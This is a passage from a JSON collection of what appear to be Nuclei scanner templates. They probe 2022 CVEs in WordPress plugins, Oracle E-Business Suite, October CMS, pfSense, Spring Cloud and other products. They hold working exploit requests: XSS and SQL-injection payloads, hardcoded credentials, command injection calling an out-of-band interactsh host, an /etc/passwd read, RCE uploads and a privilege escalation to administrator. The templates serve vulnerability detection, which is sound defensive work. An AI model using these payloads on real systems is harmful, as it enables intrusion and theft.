application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp","{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34534","info":{"name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/moduleInformation"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\\\":\", \"cloudHost\\\":\", \"remoteAddresses\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-4305","info":{"name":"Login as User or Customer < 3.3 - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1\nHost: {{Hostname}}\nCookie: loginas_old_user_id=1\n","GET /wp-admin/users.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')"],"condition":"and"}]}]},{"id":"CVE-2022-0424","info":{"name":"Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npage=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"id\":\"","username\":\"","email\":","hash\":\"","_wpnonce"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"